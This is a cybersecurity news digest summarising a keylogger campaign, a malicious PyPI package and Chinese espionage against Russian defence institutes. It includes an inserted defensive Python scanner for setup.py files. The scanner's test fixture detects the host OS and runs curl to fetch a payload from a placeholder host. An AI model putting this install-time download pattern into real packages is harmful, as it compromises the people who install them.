LA-SAFE CYBERDIGEST 05.23.2022

MALWARE | SOCIAL ENGINEERING | RANSOMWARE
Snake Keylogger Spreads Through Malicious PDFs-ThreatPost-05.23.2022
While most malicious e-mail campaigns use Word documents to hide and spread malware, a recently
discovered campaign uses a malicious PDF file and a 22-year-old Office bug to propagate the Snake
Keylogger malware, researchers have found. Attackers target victims with emails that include a PDF
document named “REMMITANCE INVOICE.pdf” (misspelling intended) as an attachment. If someone
opens the file, Adobe Reader prompts the user to open a .docx file with a rather curious name, researchers
found. The code eventually decrypts a ciphertext that turns out to be more shellcode, which is then executed
and leads to an executable called fresh.exe that loads the Snake Keylogger, researchers found.

Analyst Note:
Keylogging (keystroke logging) is the act of recording a user's keyboard interactions. Phishing emails,
trojans, bogus websites, and zero-day exploits are all used to introduce keylogging malware into systems.
Keylogger malware can be detected when systems slow down, processes fail, or strange activity occurs.
Administrators can protect systems by avoiding downloads of unknown files, changing passwords, and
enabling two-factor authentication where possible.

CYBER CRIME | CYBER DEFENSE | SECURITY BREACH
Malicious PyPI Package Opens Backdoors on Windows, Linux, and Macs -BleepingComputer-05.21.2022
A malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop
Cobalt Strike beacons and backdoors on Windows, Linux, and macOS systems. In a report by Ax Sharma,
also a reporter at Bleeping Computer, the researcher explains that the infection begins with the execution
of the ‘setup.py’ script found in the package. This script detects the host operating system and, depending
on whether it is Windows, Linux, or Darwin (macOS), fetches a compatible malicious payload that is
executed on the system. Software developers should scrutinize package names and details and double-check
their selection of building blocks when something appears strange.

Analyst Note:
The Python programming language allows you to install packages that can be included in programs to
extend their functionality. The threat actor places malicious code inside a package that can execute with
admin privileges. The malicious code abuses the package manager (‘pip’), which runs the ‘setup.py’
file of a Python package during installation. This allows the malware to execute code when the package is
installed. Administrators should analyze their setup files when using any form of programming language or
operating system. Analysis of packages or setup files with suspicious functionality may indicate these files
are compromised. This observation technique can assist in keeping systems protected from setup or package
file malware.
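The analyst note above recommends reviewing setup files before installation. The following is an added example (not code from the article or from any of the projects it mentions) of a static triage script that parses a setup.py with Python's ast module and flags the two behaviours the article describes: host-OS fingerprinting and calls that fetch or execute something at install time. The two setup.py fixtures, the call list and the URLs are constructed for the example; payload.invalid is a placeholder that resolves nowhere.

```python
"""Static triage of a setup.py: flag code that would run at 'pip install' time.

Added example; the suspicious-call list and the fixtures below are constructed.
"""
import ast

# Calls that deserve a second look inside setup.py, which runs with the
# installing user's privileges (constructed list, extend for your environment).
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "urllib.request.urlopen",
    "requests.get", "base64.b64decode", "exec", "eval", "ctypes.CDLL",
}
# Attributes that reveal host-OS detection (the reported package chose its
# payload by operating system).
OS_DETECTION = {"sys.platform", "platform.system", "os.name"}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source: str) -> list:
    """Return findings as 'line N: ...' strings sorted by line; [] means nothing flagged."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"line {node.lineno}: call to {name}"))
            elif name == "setup":
                # A custom cmdclass can hook the install step with arbitrary code.
                if any(kw.arg == "cmdclass" for kw in node.keywords):
                    findings.append((node.lineno,
                                     f"line {node.lineno}: setup() overrides install commands via cmdclass"))
        elif isinstance(node, ast.Attribute):
            name = _dotted_name(node)
            if name in OS_DETECTION:
                findings.append((node.lineno,
                                 f"line {node.lineno}: host OS fingerprinting via {name}"))
    return [msg for _, msg in sorted(findings)]


# Constructed fixture: an ordinary setup.py with only metadata.
BENIGN_SETUP = """\
from setuptools import setup
setup(name="example", version="1.0", packages=["example"])
"""

# Constructed fixture modelled on the reported behaviour: pick a download by OS,
# then run a fetch from setup.py itself. The URL is a non-resolving placeholder.
SUSPICIOUS_SETUP = """\
import sys
import subprocess
from setuptools import setup

if sys.platform == "win32":
    url = "http://payload.invalid/win"
else:
    url = "http://payload.invalid/nix"
subprocess.run(["curl", url])
setup(name="helper", version="0.1")
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, scan_setup_py(src) or "no findings")
```

To review a package before anything in it runs, fetch it without installing (`pip download --no-deps <name>`), unpack the archive and point `scan_setup_py` at its setup.py; preferring wheels (`pip install --only-binary=:all:`) avoids executing setup.py at all. This is a triage aid, not a verdict: obfuscated or string-built calls will not match the dotted names above, so an empty result means only that nothing obvious was found.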

CYBER POLICY| CYBER INFRASTRUCTURE | CYBER INITIATIVE
China-linked Twisted Panda Caught Spying on Russian Defense R&D-The Register– 05.20.2022
Chinese cyber spies targeted two Russian defense institutes and possibly another research facility in
Belarus, according to Check Point Research. The new campaign, dubbed Twisted Panda, is part of a larger,
state-sponsored espionage operation that has been ongoing for several months, according to the security
shop. The Spinner backdoor’s main purpose is to run additional payloads sent from a command-and-control
server, although the researchers say they didn’t intercept any of these other payloads. The FBI has warned
that the Chinese government isn’t above using cyberespionage and IP theft to accomplish its goals.

Analyst Note:
Generally, Twisted Panda (a Chinese APT) utilized phishing emails with malicious links and attachments.
This APT, like most, will often monitor, intercept, and relay information and sensitive data. These tactics
and exploits are common. APTs are constantly attempting to compromise organizations with high-value
information. In terms of global connectivity, all businesses have high-value information, and their files
should be treated as such. Network teams should be cognizant of any suspicious activities they find within
their networks. Teams should also treat company information as high value needing complete security.